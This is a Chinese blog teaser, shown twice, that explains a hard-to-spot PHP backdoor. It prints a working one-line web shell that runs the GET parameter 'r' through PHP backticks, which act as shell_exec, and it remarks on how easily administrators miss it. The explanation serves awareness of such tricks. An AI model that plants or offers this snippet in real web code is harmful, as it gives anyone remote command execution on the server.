一个不易被发现的PHP后门代码解析
偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。 伪装性很好,很容易被管理员忽略。 $selfNums = $_GET[‘r’];if (isset($selfNums)){ echo `$selfNums`;} 刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下
阅读更多 »
偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。 伪装性很好,很容易被管理员忽略。 $selfNums = $_GET[‘r’];if (isset($selfNums)){ echo `$selfNums`;} 刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下
阅读更多 »